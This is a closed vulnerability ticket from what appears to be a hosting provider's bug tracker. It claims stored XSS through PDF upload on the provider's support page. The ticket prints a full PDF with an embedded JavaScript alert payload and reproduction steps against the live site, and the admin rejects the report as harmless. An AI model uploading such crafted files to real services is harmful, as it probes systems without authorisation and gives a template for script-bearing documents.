Security vulnerabilities

  • Status Closed
  • Assigned To
    cbay
  • Private
Attached to Project: Security vulnerabilities
Opened by milapshah1 - 17.07.2024
Last edited by cbay - 17.07.2024

FS#63 - Stored XSS Via Upload Document

Vulnerability Explanation-When a user uploads a document containing malicious code, such as JavaScript, to the web application, it gets stored on the server without proper validation or sanitization. This allows an attacker to inject and execute arbitrary scripts within the application's context.

Impact-This vulnerability enables attackers to execute unauthorized scripts on the client-side, leading to session hijacking, data theft, or defacement of the web application. It can compromise user privacy, damage the application's reputation, and potentially expose sensitive information to malicious actors.

Severity-High

Steps to reproduce- 1) go to support https://admin.alwaysdata.com/support/

                      2) Open new ticket 
                      3) upload this code as a.pdf (%PDF-1.3

%����
1 0 obj
«/Pages 2 0 R /Type /Catalog» endobj
2 0 obj
«/Count 1 /Kids [3 0 R] /Type /Pages» endobj
3 0 obj
«/AA

<</O
<</JS
(

try {

app.alert\("xss"\)

} catch \(e\) {

app.alert\(e.message\);

}

  ) 
/S /JavaScript>>>>
/Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R
/Resources
<</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>>
/Type /Page>>

endobj
4 0 obj
«/Length 21» stream

BT
/F1 24 Tf
ET

  

endstream
endobj
xref
0 5
0000000000 65535 f
0000000015 00000 n
0000000062 00000 n
0000000117 00000 n
0000000424 00000 n
trailer

«/Root 1 0 R /Size 5» startxref
493
%%EOF)

4) upload this file
5)Open this ticket
6) click on ulpaded malicious pdf file it will refelct

Closed by  cbay
17.07.2024 14:21
Reason for closing:  Invalid
Admin
cbay commented on 17.07.2024 11:52

Hello,

As far as I know, malicious PDF files cannot do harm when viewed in a browser. Please upload a video of your PoC.

Kind regards,
Cyril

how can i uplod poc video , i did not is any attachment

Admin
cbay commented on 17.07.2024 12:01

There's a "Attach a file (max. 256 MiB)" button near the "Add comment" button.

i am able to see only 2 button add link and add comment.

i have attached poc video of google drive link – also answer to your first coomment This can lead to several types of attacks and escalations, including:

Cross-Site Scripting (XSS) Attacks: If the uploaded file contains JavaScript or other executable code, an attacker can craft malicious scripts that get executed in the context of other users' sessions when they access the uploaded content.

Server-Side Code Execution: Depending on how the application processes uploaded files, an attacker might be able to upload a file that contains server-side code (e.g., PHP, Python scripts). This could lead to remote code execution (RCE), where the attacker gains control over the server or the application's backend systems.

File Inclusion Attacks: If the application allows the inclusion of uploaded files in other parts of the application (e.g., including uploaded files as part of dynamically generated content), an attacker could manipulate this to include files containing malicious code, leading to further exploitation.

Data Injection Attacks: Beyond code execution, uploaded files could also be used to inject malicious data into the application's database or other storage systems, potentially compromising data integrity and confidentiality.

Denial of Service (DoS) Attacks: Large or specially crafted files could consume excessive server resources, leading to a denial of service for legitimate users.

Admin
cbay commented on 17.07.2024 12:16

Oh sorry, adding attachments is only available for admins.

You can put your file anywhere you want, for instance on your own alwaysdata account.

Thanks for the quick response i have attached poc link in above drive link

Admin
cbay commented on 17.07.2024 12:21

Showing a popup is not a vulnerability. As far as I know, you can't steal anything with a malicious PDF.

Hi cbay, stored xss behave like this only.also for your refrence i am sharing hackerone report .https://hackerone.com/reports/683792

Admin
cbay commented on 17.07.2024 13:34

That HackerOne report is totally different: it's a real XSS, nothing to do with PDF.

I am a security researcher. Unfortunately, I prefer not to discuss this issue further. For your reference, I am attaching the OWASP reference related to this matter. It's unfortunate that I've spent time arguing with you and you still haven't understood the points mentioned in the HackerOne report. Thank you for your response. Have a good day.https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html

Loading...

Available keyboard shortcuts

Tasklist

Task Details

Task Editing